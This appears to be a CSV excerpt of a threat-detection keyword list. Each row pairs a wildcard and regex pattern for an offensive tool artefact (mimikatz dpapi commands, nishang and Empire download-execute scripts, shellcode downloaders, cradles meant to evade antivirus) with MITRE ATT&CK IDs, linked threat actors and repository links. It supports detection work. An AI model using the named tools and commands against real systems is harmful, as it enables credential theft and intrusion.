"*Download:Cradle.js*",".{0,1000}Download\:Cradle\.js.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0011 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","N/A","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","41466"
"*Download_Cradles.*",".{0,1000}Download_Cradles\..{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0011 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","N/A","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","41467"
"*Download_Execute*",".{0,1000}Download_Execute.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","41468"
"*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41469"
"*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","41470"
"*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41471"
"*Download-Cradles.cmd*",".{0,1000}Download\-Cradles\.cmd.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0011 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","N/A","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","41472"
"*downloadexec_UACbypass.lua*",".{0,1000}downloadexec_UACbypass\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","41473"
"*Download-Execute-PS*",".{0,1000}Download\-Execute\-PS.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","41474"
"*DownloadFileImplant*",".{0,1000}DownloadFileImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","41475"
"*Downloading */*.tar to /tmp/*.pak*",".{0,1000}Downloading\s.{0,1000}\/.{0,1000}\.tar\sto\s\/tmp\/.{0,1000}\.pak.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","N/A","Added to cover the POC exploitation used in  massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","41476"
"*Downloading AD-Recon PS scripts*",".{0,1000}Downloading\sAD\-Recon\sPS\sscripts.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41477"
"*Downloading Empire PS scripts*",".{0,1000}Downloading\sEmpire\sPS\sscripts.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41478"
"*Downloading FruityC2*",".{0,1000}Downloading\sFruityC2.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41479"
"*Downloading latest Metasploit Framework*",".{0,1000}Downloading\slatest\sMetasploit\sFramework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","41480"
"*Downloading Nishang PS scripts*",".{0,1000}Downloading\sNishang\sPS\sscripts.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41481"
"*Downloading original SCNotification.exe.config via SMB*",".{0,1000}Downloading\soriginal\sSCNotification\.exe\.config\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","41482"
"*Downloading PowerSploit PS scripts*",".{0,1000}Downloading\sPowerSploit\sPS\sscripts.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41483"
"*downloadMalwareDomains*",".{0,1000}downloadMalwareDomains.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","41485"
"*downloads/wapiti-code*",".{0,1000}downloads\/wapiti\-code.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","41491"
"*downloadshellcodebin.c*",".{0,1000}downloadshellcodebin\.c.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","41493"
"*downloadshellcodebin.exe*",".{0,1000}downloadshellcodebin\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","41494"
"*DownloadString*https://checkip.amazonaws.com*",".{0,1000}DownloadString.{0,1000}https\:\/\/checkip\.amazonaws\.com.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","41495"
"*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe  -aI webanalyze -sS*",".{0,1000}\-dP\s\-eP\s\-rS\s\-cF\s\-pS\s\-tO\s\-gW\s\-\-httpx\s\-\-dnsprobe\s\s\-aI\swebanalyze\s\-sS.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","#linux","N/A","10","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","41496"
"*dpapi.py*",".{0,1000}dpapi\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41498"
"*dpapi/decryptor.py*",".{0,1000}dpapi\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","41499"
"*dpapi::blob*",".{0,1000}dpapi\:\:blob.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41500"
"*dpapi::cache*",".{0,1000}dpapi\:\:cache.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41501"
"*dpapi::capi*",".{0,1000}dpapi\:\:capi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41502"
"*dpapi::chrome*",".{0,1000}dpapi\:\:chrome.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41503"
"*dpapi::cloudapkd*",".{0,1000}dpapi\:\:cloudapkd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41504"
"*dpapi::cloudapreg*",".{0,1000}dpapi\:\:cloudapreg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41505"
"*dpapi::cng*",".{0,1000}dpapi\:\:cng.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41506"
"*dpapi::create*",".{0,1000}dpapi\:\:create.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41507"
